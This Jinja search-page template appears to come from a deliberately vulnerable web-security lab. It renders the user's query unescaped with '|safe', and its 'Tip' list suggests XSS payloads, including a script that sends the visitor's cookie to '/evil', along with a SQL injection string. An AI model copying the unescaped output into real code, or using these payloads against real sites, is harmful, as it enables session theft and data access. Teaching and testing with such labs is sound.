{% extends "base.html" %}
{% block content %}
<div class="search">
    <form method="GET">
        <input placeholder="Search here" type="text" name="search" value="{{search or ''}}" class="search_input"/>
        <input type="submit" value="GO!"/>
    </form>
</div>
<div class="search-tip">
    <b> Tip: </b>
    <ol>
        <li> Facebook </li>
        <li> &lt;script&gt; alert(&quot;XSS!&quot;) &lt;/script&gt; </li>
        <li> Facebook &lt;script&gt; $(function(){$(&quot;a&quot;).attr(&quot;href&quot;, &quot;/evil&quot;);}); &lt;/script&gt; </li>
        <li> &lt;script&gt; $.get(&quot;/evil?save=cookie&amp;cookie=&quot;+encodeURI(document.cookie)); &lt;/script&gt; </li>
        <li>aaa ' OR link LIKE 'http%</li>
    </ol>
</div>
<div>
    {% if search %}
        You searched for <b>{{search|safe}}</b>
    {% else %}
        Try searching for something!
    {% endif %}
</div>
{% if results %}
<div>
    {% for result in results %}
        <p>
            <a href="{{ result[2] }}">{{ result[0] }} </a><br/>
            {{result[1]}}
        </p>
    {% endfor %}
</div>
{% endif %}
{% endblock %}
